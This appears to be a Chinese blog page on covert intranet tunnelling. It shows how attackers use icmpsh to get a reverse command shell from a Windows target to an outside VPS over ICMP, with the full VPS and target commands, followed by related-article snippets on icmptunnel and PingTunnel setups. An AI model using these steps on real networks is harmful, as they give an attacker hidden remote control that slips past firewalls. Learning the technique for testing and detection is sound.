icmp端口_内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

最新推荐文章于 2024-01-24 17:49:10 发布
最新推荐文章于 2024-01-24 17:49:10 发布
阅读量406 收藏
点赞数
文章标签: icmp端口 ping 端口命令 windows 端口转发工具 windows 网卡转发 windows端口转发工具 内网dns转发请求被拒绝
ec72ed5f09586080fe6539d3df73b92a.png使用ICMP进行命令控制(Icmpsh) 4ef38e9066061b767d6a8fc20ac58bf2.png

目录

ICMP隧道

使用ICMP进行命令控制(Icmpsh)

4ef38e9066061b767d6a8fc20ac58bf2.png f6f3f2348ffd96b158de38af6dc85166.png ICMP隧道

ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。

在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙一般不会屏蔽ping的数据包),实现不受限制的访问访问。

f6f3f2348ffd96b158de38af6dc85166.png 使用ICMP进行命令控制(Icmpsh)

适用场景:目标机器是Windows服务器的情况

git clone https://github.com/inquisb/icmpsh.git     #先下载icmpsh工具

VPS的操作

sysctl -w net.ipv4.icmp_echo_ignore_all=1       #关闭icmp回复,如果要开启icmp回复,该值设置为0python2 icmpsh_m.py 172.31.226.161 x.x.x.x      #运行,第一个IP是VPS的eth0网卡IP,第二个IP是目标机器出口的公网IP

目标机器的操作:

icmpsh.exe -t x.x.x.x -d 500 -b 30 -s 128

88782f2e1e777ff1b5917476d579574e.png

抓包,可以看到两者之间通信都是icmp的数据包

ef5e996d6908c19870e0dea8ee672953.png

相关文章:

内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)

内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道

内网转发及隐蔽隧道 | 端口转发和端口映射

内网渗透 | 内网转发工具的使用

weixin_39851048
关注
隐秘通信-使用PingTunnel搭建ICMP隧道实验
帮助别人等于帮助自己 ——MXi4oyu
08-09 669
Internet Control Message Protocol Internet控制报文协议,简称ICMP协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。CMP协议主要提供两种功能,一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求
内网转发隐蔽隧道学习手册
谢公子的博客
08-10 1799
内网转发工具使用 内网转发隐蔽隧道 Linux利用iptables做端口复用 利用python脚本实现端口复用 Windows利用WinRM实现端口复用打造隐蔽后门
icmp端口_使用icmp隧道进行端口转发
weixin_39983223的博客
11-25 1225
作者:Taoing 编辑:白帽子社区运营团队 "ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。在一些网络环境,如果攻击者使用各类...
icmp使用什么端口
热门推荐
绯浅yousa的笔记
04-01 2万+
ICMP使用什么端口 ICMP使用什么端口PING操作又是使用什么端口ICMP是Internet控制信息协议(ICMP),是IP组的一个整合部分。通过IP包传送的ICMP信息主要用户涉及网络操作或错误操作的不可达信息。ICMP包发送是不可靠的,所以主机不能依靠接收ICMP包解决任何网络问题。ICMP不像TCP/UDP有端口,但它确实含有两个域:类型type和代码code。但是这个域的作用与T
icmp端口_网络基础知识:UDP协议之扫描主机和端口
weixin_39628271的博客
12-01 1637
一次性付费进群,长期免费索取教程,没有付费教程。进微信群回复公众号:微信群;QQ群:460500587教程列表见微信公众号底部菜单 |本文底部有推荐书籍微信公众号:计算机与网络安全ID:Computer-network如果目标主机禁止响应ICMP协议,就无法使用Ping命令来判断主机是否存在。除了使用发送TCP包进行判断以外,还可以通过发送UDP包对主机和端口进行判断。本文介绍...
icmp端口_icmptunnel搭建icmp隧道——超详细步骤
xwj1590的博客
12-08 1360
环境搭建: 攻击机kali:192.168.159.129 受害机centos:192.168.159.10 首先我们在攻击机和受害机都需要安装下icmptunnel,并把系统的icmp回显禁用掉,命令如下。 git clone https://github.com/jamesbarlow/icmptunnel.git cd icmptunnel-master echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all...
python 内网穿透_内网渗透(十五) | psexec工具使用浅析(admin$)
weixin_39779928的博客
12-10 1158
作者:谢公子CSDN安全博客专家,擅长渗透测试、Web安全攻防、红蓝对抗。其自有公众号:谢公子学安全免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表 安世加 的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!欢迎各位添加微信号:qinchang_198231 加入 安世加 交流群 和大佬们一起交...
浅析Icmp原理及隐蔽攻击的方式
MSB_WLAQ的博客
10-13 2565
一、ICMP隧道技术解析 1.icmp协议 Internet Control Message Protocol Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用 ICMP协议主要提供两种功能, 一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。常见的差.
[ 内网渗透 ] 内网端口扫描.zip
02-11
内网端口扫描是指在内部网络对目标主机进行探测,以确定哪些端口是开放的,正在监听网络连接。这有助于了解网络拓扑、服务分布和可能的安全弱点。端口扫描通常分为几种类型: 1. TCP全连接扫描:发送SYN包建立TCP...
ICMP端口号问题
weixin_34161032的博客
09-02 1万+
ICMP端口号的深思朋友面试的时候回来问我:小温,说一下ICMP端口号是多少呢?当时我也懵了,我是这样回答的:ICMP是Internet控制报文协议,没有端口号吧?这个不太清楚啊。呵呵,一个常见的协议问题,很纠结:所以稍作总结:ICMP简介:ICMP是(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议族的一个子协议,用于在IP...
基于ICMP协议的网络隐蔽通道技术的分析
03-21
分析了几种基于ICMP协议的网络隐蔽通道技术
ICMP协议端口不可达抓包
04-28
使用tftp配合sniffer抓包,通过修改tftp的目标端口为错误的端口,从而获得ICMP的错误响应包
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
huayimy的博客
01-02 1837
服务端(间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
ICMP隐蔽隧道工具--pingtunnel流量特征检测分析
qq_36259703的博客
01-24 1761
通过伪造ping,把tcp/udp/sock5流量通过远程服务器转发到目的服务器上。用于突破某些运营商封锁TCP/UDP流量。
ICMP隐藏通信隧道技术
lonmar的博客
08-04 2337
文章目录简介icmpshPingTunnel实验一实验二Icmptunnel 简介 ICMP隧道简单实用,是一个比较特殊的协议.在一般的通信里,两台主机要进行通信必须开放端口.而ICMP协议就不需要. 最常见的ICMP协议就是ping命令的回复 常见的ICMP隧道工具icmpsh,PingTunnel,icmptunnel,powershell icmpICMP隧道搭建条件: 目标主机必须支持ICMP协议的进出 探测ICMP协议是否支持: 目标主机与攻击主机能够相互PING通即可 icmpsh i
ICMP隐蔽隧道工具--icmptunnel流量特征检测分析
最新发布
qq_36259703的博客
01-24 985
icmptunnel的工作原理是将你的内容封装在ICMP echo数据包,一般在ICMP数据包的 "data "字段发送,并将其发送到你自己的。代理服务器解压缩数据包并转发。传入的以客户为目的地的IP数据包再次被封装在ICMP回复数据包,并发回给客户。
隐藏通信隧道ICMPSH
帅醉了的博客
03-22 740
内网渗透_建立icmp隧道 -t host :要向其发送ping请求的主机ip地址。此选项是必需的! -r:发送一个包含字符串“Test1234”的测试icmp请求,然后退出。这是用来测试连接的。 -d milliseconds:请求之间的延迟(毫秒) -o milliseconds:毫秒响应超时(毫秒)。如果没有及时收到回复,奴隶将增加一个空白计数器。如果计数器达到某个限制,则从机将退出。如果收...
ICMP
farmwang的专栏
10-11 1767
 
【网络安全】ICMP隐蔽隧道通信与检测
Sun_study的博客
01-17 1387
在一些网络环境,如果攻击者使用各类上层隧道(例如HTTP隧道DNS隧道,正反向端口转发等)进行操作均失败。那么可以尝试使用ICMP建立隧道ICMP协议不需要端口的开放,因为其基于IP工作的,所以我们将其归结到网络层,ICMP消息最为常见的就是ping命令的回复,将TCP/UDP数据包封装到ICMPping数据包,从而穿过防火墙**(通常防火墙是不会屏蔽ping数据包的)**
CentOS 6.5 使用iptables进行端口转发
"在CentOS 6.5操作系统,我们可以通过iptables来实现端口转发,将外部对本地3389端口的访问重定向到192.168.10.210的22端口。这个过程涉及到网络层的IP转发功能以及iptables的规则设置。" 在CentOS 6.5端口...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值